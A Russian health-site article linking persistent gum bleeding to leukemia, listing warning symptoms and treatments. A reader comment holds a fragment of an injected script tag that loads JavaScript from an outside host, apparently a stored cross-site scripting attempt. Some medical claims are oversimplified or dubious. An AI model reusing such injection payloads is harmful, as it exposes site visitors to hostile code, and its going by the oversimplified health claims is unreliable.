Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Симптомы, которые нельзя ...  >>  Симптомы, которые нельзя пропускать. Кровоточивость десен.
 
Обратная связь
 

Симптомы, которые нельзя пропускать. Кровоточивость десен.

Размер шрифта
24 февраля 2011 00:01
  • google_analytics: false
  • Нравится

По сей день врачи теряются в догадках, почему же возникает лейкемия. Однако в одном они абсолютно уверены: длительная кровоточивость десен является одним из симптомов, которые указывают на это тяжелое заболевание.

Алексей Фошкин/ «Здоровье-Инфо»

До сих пор врачи не могут понять, причины возникновения лейкемии. Однако хорошо известны ее симптомы. Ошибочно принято считать, что лейкемия, как корь или свинка, поражает исключительно детей. Эта болезнь возникает в любом возрасте, от 7 до 77 лет.

Механизм действия лейкемии прост, что свойственно практически всем серьезным заболеваниям, тяжело поддающимся лечению. Без видимых причин костный мозг дает сбои в своей работе. Оговоримся сразу: костный мозг – важный орган, который продуцирует клетки крови. Когда мы здоровы, этот орган вырабатывает несколько полноценных видов клеток:

  • Лейкоциты (клетки белового цвета), их основная задача защищать организм от вредного воздействия окружающей среды и всего, что в ней водится (микробов, бактерий, аллергенов и так далее). Именно эти клетки противостоят гриппу и другим страшным инфекционным заболеваниям.
  • Эритроциты (клетки крови красного цвета, которые и обеспечивают ей главный оттенок) – это своеобразные курьеры, они переносят кислород и другие питательные вещества ко всем органам, обеспечивая тем самым бесперебойное течение всех процессов жизнедеятельности: от биения сердца до роста волос.
  • Тромбоциты – клетки, которые минимизируют потери крови. Именно благодаря ним кровь свертывается.

При лейкемии костный мозг без видимых причин начинает вырабатывать «бракованные» лейкоциты. Вместо полноценных клеток, готовых защищать организм ото всех хворей, он выдает «полуфабрикаты»: недоразвитые клетки, которые не в состоянии справляться со своей задачей. При этом они растут быстрее нормальных лейкоцитов – из-за чего цвет кожи приобретает белесый оттенок. Ускоренное взросление «недоделанных» клеток приводит к тому, что они постепенно вытесняют эритроциты и тромбоциты. Именно после этого и возникают симптомы надвигающейся лейкемии.

Если вдруг

Симптомы серьезных заболеваний всегда вызывают дискомфорт: предупреждают нас о том, что с организмом что-то не так. При этом человеку без медицинского образования они редко подсказывают, в чем именно проблема. К сожалению, лейкемия не является исключением из этого правила. И нередко она начинается с кровоточивости десен при любом самом безобидном действии. Например, если вы откусили яблоко, а на нем остался отчетливый кровавый след – это уже один из симптомов болезни. Он свидетельствует, о том, что тромбоцитов уже недостаточно, чтобы останавливать кровь даже при незначительном повреждении. А также он сигнализирует: необходимо срочно сдать анализы на малокровие.

Практически у всех болезней есть одна общая черта – чем быстрее обратишься к врачу, тем меньше последствий. Лейкемия – из их числа. Учтите, что в данном конкретном случае требуется не только стоматолог, но и онколог.

Кроме повышенной кровоточивости десен, диагноз «лейкемия» могут подсказать еще несколько симптомов (наличие как минимум двух из них – повод обратиться к онкологу):

  • Повышение температуры без видимых причин.
  • Частые головные боли.
  • Неожиданная ломота в костях и суставах, которая никак не связана с занятиями спортом или изменениями погоды.
  • Увеличение селезенки, поэтому может наблюдаться вздутие живота, которое не проходит неделями, в совокупности с кровоточивостью десен, это должно насторожить.
  • Неожиданное похудение на фоне выше описанных симптомов также должно послужить поводом для обращения к врачу.
  • Частые инфекционные заболевания и сильные осложнения после них – тревожный сигнал.

И вас вылечат

Лейкемия – не приговор. С ней живут годами. Однако не редко у людей с таким диагнозом развивается депрессия. Ее необходимо остановить: так как она лишь ускорит те негативные процессы, которое заболевание вызвало в организме. Сегодня больным лейкемией могут оказать адекватную медицинскую помощь.

Лечение лейкемии зависит от степени ее запущенности. То есть от количества белых «бракованных» телец, которые уже успели вытеснить красные. В любом случае необходимо быстро обратиться к врачу. Своими руками или «народными средствами» тут ничего не сделать.

После того, как будет поставлен диагноз, врач предложит один из двух методов лечения (либо их комбинацию):

  1. Химиотерапия – это главный способ лечения лейкемии. В ходе него пациенту вводятся химиопрепараты, стабилизирующие выработку лейкоцитов.
  2. Лучевая терапия (радиологическое лечение) – на ранних стадиях развития заболевания избыток белых клеток разрушается с помощью облучения.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

01 июля 2015 в 00:20

Комментарий удален за нарушение Правил общения

Слайдшоу

Симптомы рака, которые пропускает ваш муж. Часть 2 Болезни крови
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.